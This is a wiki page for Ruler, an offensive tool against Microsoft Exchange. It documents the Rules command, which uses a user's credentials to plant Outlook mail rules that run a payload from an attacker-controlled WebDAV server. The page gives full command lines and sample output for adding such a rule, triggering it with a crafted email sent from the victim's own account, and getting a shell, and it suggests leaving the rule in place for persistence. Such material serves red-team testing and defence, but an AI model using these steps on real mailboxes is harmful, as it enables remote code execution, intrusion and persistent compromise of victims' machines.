Skip to content
Etienne Stalmans edited this page May 11, 2017 · 2 revisions

Rules

The Rules command allows you to create client-side mail rules, which execute an application. This can be used to retrieve and execute a remotely hosted application/file and gain a shell on the target host. The attack was originally found and described in the Silentbreak blog by @monoxgas.

Silentbreak did a great job with this attack and it has served us well. The only downside has been that it takes time to get setup. Cloning a mailbox into a new instance of Outlook can be time consuming. And then there is all the clicking it takes to get a mailrule created. Wouldn't the command line version of this attack be great? And that is how Ruler was born.

Functions

The Rules command/function has a few options. These are:

  • check -- check if we can access the mailbox
  • display -- display all existing rules
  • delete -- delete a rule
  • add -- add a new rule
  • send -- send an email, using the user's own account, to trigger a rule

Check

Check is a simple command to verify access to a mailbox and that you are able to interact with it.

./ruler  --email user@targetdomain.com --username username display

Display

Once you have a set of credentials you can target the user's mailbox. Here you'll need to know their email address (address book searching is in the planned extension).

./ruler  --email user@targetdomain.com --username username display

Output:

./ruler  --username john.ford --email john.ford@evilcorp.ninja display
Password:
[*] Retrieving MAPI info
[*] Doing Autodiscover for domain
[+] MAPI URL found:  https://mail.evilcorp.ninja/mapi/emsmdb/?MailboxId=7bb476d4-8e1f-4a57-bbd8-beac7912fb77@evilcorp.ninja
[+] User DN:  /o=Evilcorp/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=beb65f5c92f74b868c138f7bcec7bfb8-John Ford
[*] Got Context, Doing ROPLogin
[*] And we are authenticated
[*] Openning the Inbox
[+] Retrieving Rules
[+] Found 0 rules

Delete

To delete rules, use either the ruleId displayed next to the rule name (000000df1), or the rule name. You will be prompted to verify the rule being deleted if you supply only the name.

./ruler --email user@targetdomain.com --username username delete --id 000000df1
./ruler --email user@targetdomain.com --username username delete --name myrule

Add

This is where you add your rule to execute an application.

Webdav

Your initial setup is the same as outlined in the Silentbreak blog, setup your webdav server to host your payload. A basic webdav server is included in this repostitory. This can be found here. To use this,

go run webdavserv.go -d /path/to/directory/to/serve

Create a Rule

To create the new rule with Ruler:

./ruler --email user@targetdomain.com --username username add --location "\\\\yourserver\\webdav\\shell.bat" --trigger "popashell" --name maliciousrule

The various parts:

  • --location this is the location of your remote shell note the double slashes (or c:/Windows/system32/calc.exe)
  • --trigger the string within the subject you want to trigger the rule
  • --name a name for your rule

Output:

[*] Retrieving MAPI info
[*] Doing Autodiscover for domain
[+] MAPI URL found:  https://mail.evilcorp.ninja/mapi/emsmdb/?MailboxId=7bb476d4-8e1f-4a57-bbd8-beac7912fb77@evilcorp.ninja
[+] User DN:  /o=Evilcorp/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=beb65f5c92f74b868c138f7bcec7bfb8-John Ford
[*] Got Context, Doing ROPLogin
[*] And we are authenticated
[*] Openning the Inbox
[*] Adding Rule
[*] Rule Added. Fetching list of rules...
[+] Found 1 rules
Rule: shell RuleID: 01000000127380b1

You should now be able to send an email to your target with the trigger string in the subject line. From testing the mailrule is synchronised across nearly instantaniously, so in most cases you should be able to get a shell almost immediatly, assuming outlook is open and connected.

Semi-Autopwn

If you want to automate the triggering of the rule, Ruler is able to create a new message in the user's inbox, using their own email address. This means you no longer need to send an email to your target. Simply use the --send flag when creating your rule, and Ruler will wait 30seconds for your rules to synchronise (adjust this in the source if you think 30s is too long/short) and then send an email via MAPI.

To customise the email sent with the --send flag, you can use --subject to specify a custom subject (remember to include your trigger word in the subject). Customise the body with --body

...
[*] Adding Rule
[*] Rule Added. Fetching list of rules...
[+] Found 1 rules
Rule: autopop RuleID: 010000000c4baa84
[*] Auto Send enabled, wait 30 seconds before sending email (synchronisation)
[*] Sending email
[*] Message sent, your shell should trigger shortly.
[*] And disconnecting from server

Send

If you want to send the email manually, using the targets own email address, you can also call the send command directly.

./ruler --email user@targetdomain.com send --subject test --body "this is a test"

Enjoy your shell and don't forget to clean-up after yourself by deleting the rule (or leave it for persistence).

Clone this wiki locally